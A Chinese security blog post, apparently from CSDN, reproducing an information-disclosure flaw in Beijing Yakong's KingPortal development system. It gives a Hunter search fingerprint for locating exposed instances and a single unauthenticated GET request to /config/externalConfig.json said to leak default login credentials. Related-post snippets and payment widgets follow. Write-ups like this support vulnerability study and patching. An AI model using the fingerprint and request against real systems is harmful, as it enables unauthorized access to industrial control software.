【漏洞复现】北京亚控科技KingPortal开发系统 externalConfig.json 信息泄露漏洞

于 2024-05-11 09:29:06 发布
阅读量329 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 分布式 云原生 服务器 zookeeper
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/138698837
版权

0x01 产品简介

京亚控科技KingPortal开发系统可快速接入工控产品(监控采集软件、工业库)、数据库(关系库、时序库、实时库)和第三方系统数据,系统内部具有强大的图形展示能力和灵活的事件交互体系,可快速开发出面向各行各业的应用系统,并且支持与第三方系统友好融合。

0x02 漏洞概述

北京亚控科技KingPortal开发系统 /config/externalConfig.json接口存在信息泄露漏洞,未授权的攻击者可以通过该漏洞获取默认账号密码,从而登录后台。

0x03 测绘语句

hunter: web.title="KingPortal 开发系统客户端"

0x04 漏洞复现

payload:GET /config/externalConfig.json HTTP/1.1

0x05 影响范围

北京亚控科技KingPortal开发系统

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

从不学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
HSC Mailinspector loader.php 任意文件读取漏洞复现(CVE-2024-34470)
0xSec
06-03 560
由于HSC Mailinspector /public/loader.php文件中存在的路径遍历漏洞,path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使未经身份验证的攻击者能够读取服务器上的任意文件,造成信息泄露,使系统处于极不安全的状态。
漏洞复现】telesquare tlr2005 getusernamepassword 信息泄露漏洞
qq_67810151的博客
03-11 379
Telesquare Tlr-2005Ksh存在信息泄露漏洞,未授权得攻击者可以通过该漏洞获取管理员账号密码,从而登录后台。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
最新发布
qq_39894062的博客
04-20 648
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
Telesquare TLR-2005Ksh 路由器 RCE漏洞复现
0xSec
11-27 1148
Telesquare TLR-2005Ksh存在安全漏洞,未经授权的攻击者可通过setSyncTimeHost执行任意命令获取服务器权限。
Node.js
ximingx
03-16 4006
Node.js 总结
前端开发中国地图资源China.json
03-29
在前端开发中我们使用echarts图表开发飞线图时 需要用到中国地图的地理数据,此数据包涵盖了 满足的地理数据,不管是html开发,还是框架开发(vue) 直接下载放再目录里面 html 使用中国地图JSON地理数据时 const ...
Newtonsoft.json.dll v12.0.3
06-23
《Newtonsoft.Json.dll v12.0.3:.NET框架的强大JSON处理库》 在.NET开发领域,处理JSON数据是一项常见的任务。JSON(JavaScript Object Notation)是一种轻量级的数据交换格式,易于人阅读和编写,同时也易于机器...
Newtonsoft.Json.dll 4.5.0.0 版本
03-11
而Newtonsoft.Json.dll是.NET平台上最流行的JSON库,由James Newton-King 开发,它提供了丰富的API用于JSON序列化和反序列化,极大地简化了开发者处理JSON数据的工作。 Newtonsoft.Json.dll 4.5.0.0版本是该库的一...
Newtonsoft.Json.dll
03-11
`Newtonsoft.Json.dll`是一个由James Newton-King 开发的流行的JSON库,专门用于.NET框架的开发。它在Unity引擎中广泛使用,因为Unity支持C#编程,而`Newtonsoft.Json`库提供了强大的JSON序列化和反序列化功能,使得...
北京地图Json文件.json
04-01
北京地图Json文件,包含区的Geo文件、用Echarts的可以改造制作市地图下钻,市级地图,北京地图Json文件
CVE-2024-29269:Telesquare TLR-2005KSH路由器RCE漏洞复现 [附POC]
薛定谔嘚喵博客
04-11 240
Telesquare Tlr-2005Ksh是韩国Telesquare公司的Sk Telecom Lte路由器。Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
portal规范
kinglord
03-08 138
1、portal规范收藏: JSR 168 :jcp.org/aboutJava/communityprocess/final/jsr168/ JSR 286 :jcp.org/aboutJava/communityprocess/final/jsr286/   2、简介:   http://developers.sun.com/portalserver/reference/techa...
Portal技术介绍
stefshawn的专栏
08-19 1789
Portal是web应用发展的一个重要趋势,目前几乎所有大的软件厂商都有自己的Portal产品。并且Portal技术已经形成规范。本文对Portal技术和产品进行了分析,目的是为公司产品的规划提供参考。 1 Portal的概念 根据(JSR (Java Specifica
解析 gui-config.json出错,可能需要密码解密 的解决方式
热门推荐
一碗单炒饭的专栏
04-13 1万+
问题描述 启动程序时,弹出以下提示 此时需要点击右上角的关闭按钮或者输入解密密码再点击OK 解决方法 如果SS、SSR运行时出现以上提示,说明程序无法正常启动,需要自行解密程序目录下的gui-config.json文件。 此时该文件中的JSON数据无法被程序解析。 如下两种解决方式: 直接删除程序目录下的gui-config.json,不过用户之前所添加的节点信息会全部丢失。需要用户重新进行添...
解析配置文件config.json
qq_15167261的博客
07-03 2481
在课程4上 中有解析配置文件的相关讲解,可以在7月3号的版本上进行的,这个版本在百度云中有备份。
解析config.json
qq_15167261的博客
07-03 4296
在webappbuilder中,通过ConfigManager.js解析配置文件config.json,把config.json中所有的节点应用到不同的类里面
修改JSON字符串中的敏感信息
yuan487639的博客
01-24 2785
项目要求把json字符串里面的敏感信息加密,比如手机号身份证之类,这就要求遍历json,并且覆盖所有的敏感key,原本以为挺难的,静下心来想了想,代码修修改改大约一个小时搞定了,其实是一个简单的递归,跟遍历一个目录并输出所有文件名一样,废话少说,直接贴代码和测试用例。 package com.ucredit.test; import com.alibaba.fastjson.JSON; i
CTFHub-JSON Web Token-敏感信息泄露
feng的博客
09-09 1298
前言 以前是没有接触过JWT的,直到几天前看了看DDCTF的Web签到题,发现是知识盲区,后来看了看WP,才知道好多东西自己都没有学过,因此特地学习学习。 关于JWT的基础知识,我觉得下面这个文章写的挺好的: JSON Web Token 入门教程 知道了JWT的基础知识,我们便开始做CTFHub中关于JWT的相关题目。 WP 首先打开环境发现是要登录的,我们直接burp抓包来看一看: 在response里发现了token。我们直接对token的header和payload进行base64url解码,解码
windows系统c语言latch.json
09-19
latch.json 是一个在 Windows 系统下使用 C 语言编写的 JSON 解析库。 JSON(JavaScript Object Notation)是一种轻量级的数据交换格式,广泛用于各种应用程序中的数据传输与存储。latch.json 提供了对 JSON 格式数据的解析和操作的功能。它可以将 JSON 格式的数据转化为 C 语言中的数据结构,方便开发者使用和操作。 latch.json 提供了一组简单且易于使用的 API,方便开发者解析 JSON 数据。开发者可以通过调用相关的函数,传入 JSON 数据的字符串和相应的参数,实现对 JSON 数据的解析、访问和遍历。 使用 latch.json开发者可以轻松地对 JSON 数据进行读取、修改和生成。通过提供一系列的函数,latch.json 可以让开发者在 C 语言的环境下更加方便地处理 JSON 数据。 此外,latch.json 还提供了一些高级功能,例如控制对 JSON 数据的解析方式,支持自定义的数据类型映射等。 总之,latch.json 是一个在 Windows 系统下使用 C 语言编写的 JSON 解析库,它提供了一组简单易用的 API,让开发者可以方便地解析、访问和遍历 JSON 数据。使用 latch.json开发者可以更加轻松地处理和操作 JSON 格式的数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值